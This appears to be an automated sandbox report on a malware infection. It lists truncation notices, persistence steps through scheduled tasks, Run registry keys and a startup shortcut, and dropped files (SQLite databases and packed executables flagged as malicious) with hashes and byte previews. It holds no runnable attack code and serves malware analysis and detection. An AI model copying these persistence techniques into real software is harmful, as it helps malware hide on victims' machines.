HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:15:35	Task Scheduler	Run new task: explorha path: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
08:16:02	Task Scheduler	Run new task: Firefox Default Browser Agent 95CF6C9D74ED4D44 path: C:\Users\user\AppData\Roaming\wsjtivv
08:16:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run baran.exe C:\Users\user\AppData\Local\Temp\1000022001\baran.exe
08:16:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run baran.exe C:\Users\user\AppData\Local\Temp\1000022001\baran.exe
08:16:29	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SafeServe.url
09:14:52	API Interceptor	18x Sleep call for process: i1crvbOZAP.exe modified
09:15:17	API Interceptor	1x Sleep call for process: g1nHVnlr2tXTEWQsRz_M547D.exe modified
09:15:19	API Interceptor	568x Sleep call for process: RegAsm.exe modified
09:15:21	API Interceptor	6x Sleep call for process: RMz4w55AcOQKH9K459dvrUGA.exe modified
09:15:21	API Interceptor	6x Sleep call for process: KUc3lCE6xAEEreIlM0ct4583.exe modified
09:15:21	API Interceptor	1x Sleep call for process: CQTbcHuZCBIaghzHIvMnZgpt.exe modified
09:15:22	API Interceptor	2x Sleep call for process: svchost.exe modified
09:15:26	API Interceptor	1x Sleep call for process: fSJI2dwukNtWVEjIwlXBl7N4.exe modified
09:15:32	API Interceptor	2067x Sleep call for process: explorer.exe modified
09:15:43	API Interceptor	1x Sleep call for process: WerFault.exe modified
09:16:09	API Interceptor	738x Sleep call for process: xDVBd5GtHhrlSm0slOnr7_gW.exe modified
09:16:09	API Interceptor	749x Sleep call for process: uRWnWA7bjEhugCQgmREIdGsh.exe modified

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	modified
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFBAFBKEGCFBGCBFIDAKEHDAFC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFCBAEBAEB.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	889599
Entropy (8bit):	7.984770569195122
Encrypted:	false
SSDEEP:	24576:FO+wT8lBiVYAXvTWBWpmnQft6vrmJNMwZsZA4:09wydviopmn5K90A4
MD5:	3962D7FFCCD3834FBEDEF6B6D9E1CCA4
SHA1:	23BEFC283ECF95FF891918EBEA3ACAB1BDF351CE
SHA-256:	885F02FED18354E3318B966A7969B4415088E5ED6DDC124AEFAC517244B658C6
SHA-512:	1157DD78D19EE2BD9D57F991FDCA46294790D86737B66FD43FB1725053F1B9A00E20F3A207D8FA13B727B433C7AF2EAC626E8F2718BFDA6941C4E06EFB9CCCE5
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 54% Antivirus: Virustotal, Detection: 43%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.pD...........................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...pD....;..F..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGDHDAFI

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BGHCGCAE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKJJEBKK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBGCBGCAFIIECBFIDHIJKFBAKE

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DAECAECFCAAEBFHIEHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKKFCBAKK.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8060192
Entropy (8bit):	7.987762562512362
Encrypted:	false
SSDEEP:	98304:78X+JC5cCZOdf4SwIO7bwihiz40HbJKqc1oDKZAKRMvRBfRWyTtdl4CqswYfooZT:78F5OhLAMYGJLZMqvbfRWUdXDTPww
MD5:	020E56EC21EE996733D9309348D841EB
SHA1:	757BD41B36AE35153026889BA09DB5AEA37EDDC3
SHA-256:	04E37C9DD04BF56B74127D6E21D9DC107B5BAAE7F689C291B3295B119D323F26
SHA-512:	669F0111226A233B6E848831EDD36476329FCC9C57E292E7BBD103B9AD95014811055111BC62EFE89D727DAA56F994758DFADC1AC467679B07DEDD78B86063CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 46% Antivirus: Virustotal, Detection: 41%, Browse
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......f...z......[J.........@.............................@........{...`..................................................z..P.... ..T...@........Nz. .......X...........................X...(.......8...............X............................text....d.......................... ..`.rdata..............................@..@.data...pDz.........................@....pdata........z.....................@..@.00cfg........{.....................@..@.tls..........{.....................@....vmp.u..... {..................... ..`.vmp.u............................@....vmp.uL!z....."z.................`..h.reloc..X............,z.............@..@.rsrc...T.... .......Bz.............@..@................................................................................................................................................................................

C:\ProgramData\DHIDHIEGIIIECAKEBFBA

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DHJDAFIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DTBZGIOOSO.xlsx

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.705615236042988
Encrypted:	false
SSDEEP:	24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
MD5:	159C7BA9D193731A3AAE589183A63B3F
SHA1:	81FDFC9C96C5B4F9C7730127B166B778092F114A
SHA-256:	1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
SHA-512:	2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
Malicious:	false
Reputation:	unknown
Preview:	DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP

C:\ProgramData\EBGCFBGCBFHJECBGDAKKJDGHII

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHCGCFHDHIIIDGCAAEGDAFBFHD

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIIJJKKFHIEHJKECGCGC

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDGHJEHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDHIEHJE

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GHDHDGHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HCAFIJDGHCBFHJKFCGIEBGIIJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIEBAKEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJKKEHJDHJKFIECAAKFI

Download File

Process:	C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JDAFIEHIEGDHIDGDGHDHJJJDGH

Download File

